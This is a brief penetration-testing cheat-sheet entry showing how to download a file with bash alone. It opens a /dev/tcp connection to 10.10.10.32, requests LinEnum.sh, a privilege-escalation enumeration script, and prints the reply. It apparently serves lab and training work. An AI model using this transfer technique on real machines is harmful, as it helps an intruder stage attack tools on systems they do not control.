Bash Download

Connect to the webserver:

exec 3<>/dev/tcp/10.10.10.32/80

We send a GET request:

echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3

To print the response:

cat <&3

Last updated